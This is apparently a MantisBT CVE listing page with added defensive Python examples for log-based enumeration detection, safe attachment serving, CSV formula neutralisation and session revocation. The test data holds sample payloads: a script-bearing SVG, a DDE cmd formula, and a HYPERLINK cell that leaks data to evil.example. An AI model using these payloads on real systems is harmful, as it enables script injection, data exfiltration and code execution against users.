Mantis Bug Tracker (MantisBT)
By the Year
So far in 2024, 0 vulnerabilities have been published for MantisBT. Last year MantisBT had 3 security vulnerabilities published. At the current rate, MantisBT is on track to have fewer published security vulnerabilities in 2024 than it did last year.
Year | Vulnerabilities | Average CVSS Score |
---|---|---|
2024 | 0 | 0.00 |
2023 | 3 | 4.90 |
2022 | 4 | 6.35 |
2021 | 4 | 6.40 |
2020 | 7 | 5.57 |
2019 | 4 | 7.00 |
2018 | 7 | 5.39 |
It may take a day or so for new MantisBT vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally, vulnerabilities may be tagged under a different product or component name (for example a MantisBT plugin rather than MantisBT itself).
Recent MantisBT Security Vulnerabilities
CVE-2023-49802
6.1 - Medium
December 11, 2023
The LinkedCustomFields plugin for MantisBT allows users to link values between two custom fields, creating linked drop-downs. Prior to version 2.0.1, cross-site scripting in the MantisBT LinkedCustomFields plugin allows JavaScript execution when a crafted Custom Field is linked via the plugin and displayed when reporting a new Issue or editing an existing one. This issue is fixed in version 2.0.1. As a workaround, MantisBT's default Content Security Policy blocks script execution, provided it has not been relaxed.
XSS
CVE-2023-44394
4.3 - Medium
October 16, 2023
MantisBT is an open source bug tracker. Due to insufficient access-level checks on the Wiki redirection page, any user can reveal the names of private Projects by requesting wiki.php with sequentially incremented IDs. This issue has been addressed in commit `65c44883f`, which is included in release `2.25.8`. Users are advised to upgrade. Users unable to upgrade should disable wiki integration (`$g_wiki_enable = OFF;`).
Exposure of Resource to Wrong Sphere
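The access pattern behind this issue (one client walking an ID-keyed page with consecutive IDs) is easy to spot in web server logs after the fact. The following is an added example, written in Python for this page and not MantisBT code, that flags such enumeration in combined-format access logs. The wiki.php?id and bug_revision_view_page.php?bugnote_id endpoints come from the advisories listed here; the file_download.php?file_id and view.php?id entries are assumed default MantisBT URLs, and the log lines are constructed for the example.

```python
"""Detecting sequential object-ID enumeration in web server access logs.

Added example (Python), not MantisBT code. It looks for a single client walking
an ID-taking endpoint with consecutive IDs, the access pattern behind
CVE-2023-44394 (wiki.php?id=N) and the other ID-keyed pages in this list.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format. Assumption: the log lines follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

# Script name -> query parameter holding the object ID. wiki.php?id and
# bug_revision_view_page.php?bugnote_id come from the advisories on this page;
# file_download.php?file_id and view.php?id are assumed default MantisBT URLs.
WATCHED = {
    "wiki.php": "id",
    "bug_revision_view_page.php": "bugnote_id",
    "file_download.php": "file_id",
    "view.php": "id",
}


def parse_line(line):
    """Return (ip, user, script, object_id, status) for a watched request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    script = parts.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return None
    values = parse_qs(parts.query).get(param)
    if not values or not values[0].isdigit():
        return None
    return m["ip"], m["user"], script, int(values[0]), int(m["status"])


def longest_sequential_run(ids):
    """Length of the longest run where each ID is exactly the previous ID plus one."""
    if not ids:
        return 0
    best = run = 1
    for prev, cur in zip(ids, ids[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def detect_enumeration(lines, min_run=5):
    """Alert on any (client, user, endpoint) that walks >= min_run consecutive IDs."""
    seen = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            ip, user, script, obj_id, _status = rec
            seen[(ip, user, script)].append(obj_id)
    alerts = []
    for (ip, user, script), ids in seen.items():
        run = longest_sequential_run(ids)
        if run >= min_run:
            alerts.append({
                "client": ip, "user": user, "endpoint": script,
                "requests": len(ids), "sequential_run": run,
                "id_range": (min(ids), max(ids)),
            })
    return alerts


# Constructed sample log: one client probing wiki.php?id=1..8 (each answered by
# the redirect that leaks the project name), plus normal issue views by another.
SAMPLE_LOG = [
    f'203.0.113.7 - - [16/Oct/2023:10:00:{i:02d} +0000] '
    f'"GET /mantis/wiki.php?id={i} HTTP/1.1" 302 0'
    for i in range(1, 9)
] + [
    '198.51.100.2 - alice [16/Oct/2023:10:01:00 +0000] "GET /mantis/view.php?id=1023 HTTP/1.1" 200 8810',
    '198.51.100.2 - alice [16/Oct/2023:10:02:30 +0000] "GET /mantis/view.php?id=4711 HTTP/1.1" 200 9120',
    '198.51.100.2 - alice [16/Oct/2023:10:03:00 +0000] "GET /mantis/my_view_page.php HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    for alert in detect_enumeration(SAMPLE_LOG):
        print(alert)
```

The run length, not the request count, is the signal: a legitimate user opening a few unrelated issues produces a run of 1, while a scraper produces a run as long as the ID space it covered. Tune `min_run` per endpoint, since wiki.php is rarely requested by the same client more than a handful of times in a day.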
CVE-2023-22476
4.3 - Medium
February 23, 2023
Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions prior to 2.25.6, due to insufficient access-level checks, any logged-in user allowed to perform Group Actions can access the _Summary_ field of private Issues (i.e. those with Private view status, or belonging to a private Project) via a crafted `bug_arr[]` parameter in *bug_actiongroup_ext.php*. This issue is fixed in version 2.25.6. There are no workarounds.
CVE-2022-33910
5.4 - Medium
June 24, 2022
An XSS vulnerability in MantisBT before 2.25.5 allows remote attackers to attach crafted SVG documents to issue reports or bugnotes. When a user or an admin clicks on the attachment, file_download.php renders the SVG document inline in a browser tab instead of serving it as a file download, so any JavaScript embedded in the SVG executes in the MantisBT origin.
XSS
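Two independent controls close this class of bug: serve uploads with headers that force a download and forbid content-type sniffing, and reject SVG uploads that carry active content. The block below is an added example in Python, written for this page; it is not MantisBT's file_download.php and makes no claim about how that script is implemented. The header names are standard HTTP; the two SVG samples are constructed.

```python
"""Serving user uploads so that an SVG (or HTML) attachment cannot run script.

Added example (Python); it is not MantisBT's file_download.php. Two independent
controls are shown: response headers that force a download and forbid
type sniffing, and a scan that flags SVG files carrying active content.
"""
import xml.etree.ElementTree as ET

# Types a browser renders as a document, executing any script inside, when
# shown inline. They are always served as downloads regardless of the caller's wish.
ACTIVE_CONTENT_TYPES = {
    "image/svg+xml", "text/html", "application/xhtml+xml",
    "text/xml", "application/xml",
}


def download_headers(filename, content_type, inline_allowed=False):
    """Response headers for an attachment. inline_allowed models a 'preview in
    browser' option; it is honoured only for passive types such as image/png."""
    ct = content_type.split(";", 1)[0].strip().lower() or "application/octet-stream"
    disposition = "inline" if inline_allowed and ct not in ACTIVE_CONTENT_TYPES else "attachment"
    # Strip characters that would let a filename inject extra header parameters.
    safe_name = "".join(c for c in filename if c not in '";\r\n')
    return {
        "Content-Type": ct,
        "Content-Disposition": f'{disposition}; filename="{safe_name}"',
        # Stop the browser from promoting a misdeclared file to HTML/SVG.
        "X-Content-Type-Options": "nosniff",
        # Even if something is rendered, deny it script, network and same-origin access.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def svg_active_content(svg_bytes):
    """List the reasons an SVG would execute script if rendered inline.
    Uses the stdlib parser, which does not fetch external entities; assumption:
    input size is already bounded by the upload limit."""
    findings = []
    root = ET.fromstring(svg_bytes)
    for el in root.iter():
        if not isinstance(el.tag, str):      # comments/PIs, if a parser keeps them
            continue
        local = el.tag.rsplit("}", 1)[-1].lower()
        if local == "script":
            findings.append("script element")
        elif local == "foreignobject":
            findings.append("foreignObject element (embeds HTML)")
        for name, value in el.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()
            scheme = "".join(value.split()).lower()   # browsers ignore whitespace in the scheme
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{local}>")
            elif attr == "href" and scheme.startswith("javascript:"):
                findings.append(f"javascript: URL on <{local}>")
    return findings


# Constructed samples: a weaponised attachment and a harmless icon.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)">
  <a xlink:href="java&#9;script:alert(1)"><text y="20">click me</text></a>
  <script>fetch('/mantis/api/rest/users/me')</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

if __name__ == "__main__":
    print(download_headers("bug.svg", "image/svg+xml", inline_allowed=True))
    print(svg_active_content(MALICIOUS_SVG))
```

The header control is the one that actually closes the reported bug, because it does not depend on recognising every obfuscation an SVG can carry; the scanner is a useful second layer for rejecting obviously hostile uploads at submission time. Note that `Content-Disposition: attachment` only helps if the attachment is not also reachable through a path that inlines it, so check every download route, not just the main one.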
CVE-2022-28508
6.1 - Medium
May 04, 2022
An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
XSS
CVE-2021-43257
7.8 - High
April 14, 2022
Lack of Neutralization of Formula Elements in the CSV API of MantisBT before 2.25.3 allows an unprivileged attacker to execute code or gain access to information when a user opens the CSV file generated by csv_export.php in Excel. The attacker only needs to be able to store text in a field that is included in the export, such as an issue summary.
CSV Injection
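The defence is to mark any cell that a spreadsheet would evaluate as text before writing it out. The following is an added example in Python, written for this page and not the csv_export.php fix; it shows the trigger characters, the apostrophe-prefix neutralisation, an audit helper, and the edge case of negative numbers that should stay numeric. The issue rows are constructed sample data.

```python
"""Neutralising spreadsheet formulas in a CSV export.

Added example (Python), not the csv_export.php fix. Excel and LibreOffice evaluate
a cell whose text starts with '=', '+', '-' or '@' (and, in some versions, a tab or
carriage return) as a formula, so an issue summary such as =cmd|' /C calc'!A0 runs
when the exported file is opened. The fix is to mark such cells as text.
"""
import csv
import io

# Leading characters that turn a cell into a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True if a spreadsheet would evaluate this cell. Leading spaces are
    ignored because the spreadsheet trims them before deciding."""
    return isinstance(value, str) and value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Return the cell as it should be written.
    Plain numbers such as -5 or +1.5 are left alone; anything else that looks
    like a formula gets a leading apostrophe, which spreadsheets treat as a
    text marker. The csv writer then quotes the whole field."""
    if not is_formula_like(value):
        return value
    try:
        float(value)
        return value
    except ValueError:
        return "'" + value


def export_rows(rows, fieldnames):
    """Render rows as CSV text with every cell neutralised and fully quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


def dangerous_cells(rows, fieldnames):
    """Audit helper: (row index, field) for every cell that would be neutralised,
    i.e. what an attacker has already planted in the tracker's free-text fields."""
    return [(i, k) for i, row in enumerate(rows) for k in fieldnames
            if neutralize_cell(row.get(k, "")) != row.get(k, "")]


# Constructed sample: the issue data a tracker would export, with two planted payloads.
SAMPLE_ISSUES = [
    {"id": "1", "summary": "Login fails on Safari", "priority": "-5"},
    {"id": "2", "summary": '=HYPERLINK("http://evil.example/?"&A1,"click")', "priority": "normal"},
    {"id": "3", "summary": "  @SUM(1+1)*cmd|' /C calc'!A0", "priority": "+high"},
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ISSUES, ["id", "summary", "priority"]))
    print(dangerous_cells(SAMPLE_ISSUES, ["id", "summary", "priority"]))
```

Quoting every field matters as much as the apostrophe: without it, a payload containing a comma or a newline can start a new cell or row and escape the prefix. Run `dangerous_cells` over existing data after upgrading, since the payloads an attacker stored before the fix are still in the database and will still be exported.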
CVE-2022-26144
6.1 - Medium
April 13, 2022
An XSS issue was discovered in MantisBT before 2.25.3. Improper escaping of a Plugin name allows execution of arbitrary code (if CSP allows it) in manage_plugin_page.php and manage_plugin_uninstall.php when a crafted plugin is installed.
XSS
CVE-2021-33557
6.1 - Medium
June 17, 2021
An XSS issue was discovered in manage_custom_field_edit_page.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
XSS
CVE-2009-20001
8.1 - High
March 07, 2021
An issue was discovered in MantisBT before 2.24.5. It associates a unique cookie string with each user. This string is not reset upon logout (i.e., the user session is still considered valid and active), allowing an attacker who has somehow obtained a user's cookie to log in as that user at any later time.
Insufficient Session Expiration
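The root cause is a cookie that identifies the user rather than the login, so logout has nothing server-side to revoke. The block below is an added example in Python, written for this page and not MantisBT's session code: a minimal store that reproduces the behaviour described above beside one that mints a fresh random token per login, keeps only a hash of it, deletes it on logout and expires it. The class and method names are this example's own.

```python
"""Session tokens that survive logout, and the fix.

Added example (Python), not MantisBT's session code. PerUserCookieStore models the
behaviour described above: one fixed cookie string per user that logout never
resets, so a stolen cookie keeps working. SessionStore is the hardened design:
a fresh random token per login, stored only as a hash, deleted on logout, with
an expiry.
"""
import hashlib
import secrets
import time


class PerUserCookieStore:
    """Vulnerable pattern: the cookie identifies the user, not the login."""

    def __init__(self):
        self._cookie_by_user = {}
        self._user_by_cookie = {}

    def login(self, user, now=None):
        cookie = self._cookie_by_user.get(user)
        if cookie is None:                       # minted once, then reused forever
            cookie = secrets.token_urlsafe(32)
            self._cookie_by_user[user] = cookie
            self._user_by_cookie[cookie] = user
        return cookie

    def logout(self, cookie):
        pass    # only the browser discards the cookie; the server still honours it

    def resolve(self, cookie, now=None):
        return self._user_by_cookie.get(cookie)


class SessionStore:
    """Hardened pattern: a session is a server-side record keyed by a random token."""

    def __init__(self, ttl_seconds=3600):
        self._sessions = {}          # sha256(token) -> (user, expiry)
        self.ttl = ttl_seconds

    @staticmethod
    def _key(token):
        # Store only a hash so a leaked session table does not hand out live tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, user, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)        # new token every login
        self._sessions[self._key(token)] = (user, now + self.ttl)
        return token

    def logout(self, token):
        self._sessions.pop(self._key(token), None)   # invalidate server-side

    def resolve(self, token, now=None):
        now = time.time() if now is None else now
        rec = self._sessions.get(self._key(token))
        if rec is None:
            return None
        user, expiry = rec
        if now > expiry:
            self._sessions.pop(self._key(token), None)
            return None
        return user


def stolen_cookie_replays(store):
    """Does a cookie captured during a session still authenticate after logout?"""
    cookie = store.login("alice")
    store.logout(cookie)
    return store.resolve(cookie) == "alice"


def token_changes_between_logins(store):
    """Does each login mint a distinct token?"""
    first = store.login("alice")
    store.logout(first)
    return store.login("alice") != first


if __name__ == "__main__":
    print("per-user cookie replays after logout:", stolen_cookie_replays(PerUserCookieStore()))
    print("session token replays after logout:  ", stolen_cookie_replays(SessionStore()))
```

Rotating the token on login also closes session fixation, and the server-side record gives you somewhere to hang a "log out everywhere" action and a password-change revocation, neither of which is possible when the cookie value is a property of the user account.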
CVE-2020-35571
6.1 - Medium
February 22, 2021
An issue was discovered in MantisBT through 2.24.3. In the helper_ensure_confirmed call in manage_custom_field_update.php, the custom field name is output without escaping, allowing HTML injection on the confirmation page; whether this leads to script execution depends on CSP settings.
XSS
CVE-2020-36192
5.3 - Medium
January 18, 2021
An issue was discovered in the Source Integration plugin before 2.4.1 for MantisBT. An attacker can gain access to the Summary field of private Issues (either marked as Private, or part of a private Project) if they are attached to an existing Changeset. The information is visible on the view.php page, as well as on the list.php page (a pop-up on the Affected Issues id hyperlink). Additionally, if the attacker meets the plugin's "Update threshold" access level (set to "updater" by default), they can link any Issue to a Changeset by entering the Issue's Id, even if they do not have access to it.
CVE-2020-35849
7.5 - High
December 30, 2020
An issue was discovered in MantisBT before 2.24.4. An incorrect access check in bug_revision_view_page.php allows an unprivileged attacker to view the Summary field of private issues, as well as bugnote revisions, gaining access to potentially confidential information via the bugnote_id parameter.
AuthZ
CVE-2020-25288
4.8 - Medium
September 30, 2020
An issue was discovered in MantisBT before 2.24.3. When editing an Issue in a Project where a Custom Field with a crafted Regular Expression property is used, improper escaping of the corresponding form input's pattern attribute allows HTML injection and, if CSP settings permit, execution of arbitrary JavaScript.
XSS
CVE-2020-25781
4.3 - Medium
September 30, 2020
An issue was discovered in file_download.php in MantisBT before 2.24.3. Users without access to view private issue notes are able to download the (supposedly private) attachments linked to these notes by accessing the corresponding file download URL directly.
AuthZ
CVE-2020-25830
4.8 - Medium
September 30, 2020
An issue was discovered in MantisBT before 2.24.3. Improper escaping of a custom field's name allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript when attempting to update said custom field via bug_actiongroup_page.php.
XSS
CVE-2020-16266
5.4 - Medium
August 12, 2020
An XSS issue was discovered in MantisBT before 2.24.2. Improper escaping on view_all_bug_page.php allows a remote attacker to inject arbitrary HTML into the page by saving it into a text Custom Field, leading to possible code execution in the browser of any user subsequently viewing the issue (if CSP settings allow it).
XSS
CVE-2019-15539
6.1 - Medium
March 19, 2020
The proj_doc_edit_page.php Project Documentation feature in MantisBT before 2.21.3 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename. The code is executed when editing the document's page.
XSS
CVE-2020-8981
6.1 - Medium
February 13, 2020
A cross-site scripting (XSS) vulnerability was discovered in the Source Integration plugin before 1.6.2 and 2.x before 2.3.1 for MantisBT. The repo_delete.php Delete Repository page allows execution of arbitrary code via a repo name (if CSP settings permit it). This is related to CVE-2018-16362.
XSS
CVE-2019-15715
7.2 - High
October 09, 2019
MantisBT 1.3.x before 1.3.20 and 2.x before 2.22.1 allows Post Authentication Command Injection, leading to Remote Code Execution. The high CVSS score reflects the server-side impact; the attacker needs an authenticated account with the relevant privileges first.
Shell injection
CVE-2019-15074
9.6 - Critical
August 21, 2019
The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename. The code is executed for any user having visibility to the issue, whenever My View Page is displayed.
XSS